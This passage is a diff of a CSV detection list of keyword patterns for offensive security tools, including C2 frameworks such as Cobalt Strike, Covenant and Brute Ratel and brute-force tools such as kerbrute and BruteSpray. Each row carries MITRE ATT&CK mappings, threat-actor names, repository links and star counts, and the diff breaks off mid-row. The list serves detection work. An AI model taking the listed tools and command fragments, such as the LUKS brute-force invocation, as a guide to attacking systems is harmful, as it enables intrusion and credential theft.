T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*brun_script_in_mem*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*brunasadmin*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the 
tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*Brute/Brute.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Brute/Brute.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Brute/Brute.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Brute/Brute.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Brute/Brute.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Brute/Brute.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*brute_force_ntlm.sh*","offensive_tool_keyword","lyncsmash","a collection of 
tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*bruteforce *.txt*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteforce *.txt*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*Brute-force Unsuccessful!*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*bruteforce.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteforce.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*BruteForce.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*BruteforceCLSIDs.*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" -"*bruteForceCombos*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteForceCombos*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*Brute-force-Instagram-*.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" "*bruteforce-luks -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*bruteforce-luks -t 4 -l 5 -m 5 /dev/sdb1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteForceUser*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*bruteloader*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - 
T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*brute-locadmin *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*brute-locadmin *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*brute-ratel-*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - 
T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BruteRatel*.tar.gz*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BruteRatel*.zip*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bruteratel.com/*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bruteratel/*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - 
T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Brute-Ratel-C4*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*Brutesploit.git*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" -"*BruteSploit/wlist/*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" -"*brutespray*","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","1771","378","2023-03-15T23:00:29Z","2017-04-05T17:05:10Z" -"*BruteStager.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*BruteStager.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*bruteuser.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*bruteuserCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*BruteX*","offensive_tool_keyword","BruteX","Automatically brute force all services running on a target. Open ports. 
Usernames Passwords","T1110","TA0007 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/1N3/BruteX","1","0","N/A","N/A","10","1713","562","2023-08-16T04:00:18Z","2015-06-01T22:28:19Z" +"*Brutesploit.git*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*BruteSploit/wlist/*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*brutespray*","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","1772","378","2023-03-15T23:00:29Z","2017-04-05T17:05:10Z" +"*BruteStager.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*BruteStager.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*bruteuser.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*bruteuserCmd*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*BruteX*","offensive_tool_keyword","BruteX","Automatically brute force all services running on a target. Open ports. 
Usernames Passwords","T1110","TA0007 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/1N3/BruteX","1","0","N/A","N/A","10","1714","562","2023-08-16T04:00:18Z","2015-06-01T22:28:19Z" "*bshinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bshinject*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bshspawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" 
@@ -8023,13 +8170,13 @@ "*bucketloot-openbsd64*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" "*bucketloot-windows32.exe*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" "*bucketloot-windows64.exe*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" -"*buffer_overflow.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*buffer_overflow.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 
